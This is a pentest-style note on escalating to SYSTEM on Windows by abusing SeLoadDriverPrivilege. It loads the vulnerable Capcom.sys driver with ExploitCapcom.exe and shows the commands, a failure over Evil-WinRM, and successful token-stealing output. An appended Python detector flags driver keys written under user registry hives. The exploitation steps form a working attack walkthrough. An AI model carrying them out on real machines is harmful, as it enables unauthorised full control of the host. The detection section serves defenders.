Exploiting SeLoadDriverPrivilege on Windows, a note by manesec.
You need two files: Capcom.sys and ExploitCapcom.exe.
ExploitCapcom.exe can be downloaded from here, or git clone this.
Capcom.sys can be downloaded from here, or git clone this.
NOTE: Please use the absolute path!
ExploitCapcom.exe LOAD C:\mane\Capcom.sys
ExploitCapcom.exe EXPLOIT whoami

Failure message:
C:\mane>ExploitCapcom.exe EXPLOIT whoami
ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[-] CreateFile failed

I found that when you try to exploit via Evil-WinRM, it fails:
*Evil-WinRM* PS C:\mane> ./ExploitCapcom.exe LOAD C:\mane\Capcom.sys
[*] Service Name: whqobdxtø/°È
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\????????????????????
NTSTATUS: c0000034, WinError: 0
*Evil-WinRM* PS C:\mane> ./ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[-] CreateFile failed

You may need to spawn a CMD shell to exploit it.
When it succeeds, it returns:
C:\mane>ExploitCapcom.exe LOAD C:\\mane\Capcom.sys
ExploitCapcom.exe LOAD C:\\mane\Capcom.sys
[*] Service Name: iihqptxj��tE]
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\????????????????????
NTSTATUS: 00000000, WinError: 0
C:\mane>ExploitCapcom.exe EXPLOIT whoami
ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001BCE4D10008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system
C:\mane>

Capcom.sys: from M4t35Z's Blog
ExploitCapcom.exe: from clubby789
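
For detection: the "Loading Driver" lines above show the driver key sitting under \Registry\User\<SID>\ instead of under HKLM's Services key. The following is an added example, not part of the original note or of ExploitCapcom, that flags this pattern in registry-write telemetry. It assumes events shaped like Sysmon Event ID 13 (registry value set); the sample events, the SID and the key names are constructed.

```python
import re
from collections import defaultdict

# A service-style value inside a per-user hive: HKU\<user SID>\<key>\<value>
USER_KEY = re.compile(r"^HKU\\(S-1-5-21-[\d-]+)\\(.+)\\(ImagePath|Type)$", re.I)

# Constructed sample events, shaped like Sysmon Event ID 13 (assumed field names).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\mane\ExploitCapcom.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\examplekey\ImagePath",
     "Details": r"\??\C:\mane\Capcom.sys"},
    {"EventID": 13, "Image": r"C:\mane\ExploitCapcom.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\examplekey\Type",
     "Details": "DWORD (0x00000001)"},
    # Normal driver install: lives under HKLM, must not be flagged.
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\exampledrv\ImagePath",
     "Details": r"\SystemRoot\System32\drivers\exampledrv.sys"},
    # Unrelated per-user value that happens to be named Type.
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\ExampleApp\Type",
     "Details": "DWORD (0x00000002)"},
]

def find_user_hive_driver_keys(events):
    """Return findings for user-hive keys that look like driver service entries."""
    keys = defaultdict(dict)
    for ev in events:
        m = USER_KEY.match(ev.get("TargetObject", ""))
        if ev.get("EventID") != 13 or not m:
            continue
        sid, key, value = m.groups()
        keys[(sid, key)][value.lower()] = ev["Details"]
        keys[(sid, key)]["process"] = ev.get("Image", "")
    findings = []
    for (sid, key), e in sorted(keys.items()):
        image = e.get("imagepath", "")
        if not image.lower().endswith(".sys"):
            continue  # no driver image was written to this key
        # Type 1 = SERVICE_KERNEL_DRIVER; both values together is the stronger signal
        kernel = e.get("type", "").lower().endswith("(0x00000001)")
        findings.append({"sid": sid, "key": key, "driver": image, "process": e["process"],
                         "severity": "high" if kernel else "medium"})
    return findings

if __name__ == "__main__":
    for finding in find_user_hive_driver_keys(SAMPLE_EVENTS):
        print(finding)
```

Pair this with driver-load telemetry and a driver blocklist, since the registry write only shows the attempt, not whether the load succeeded.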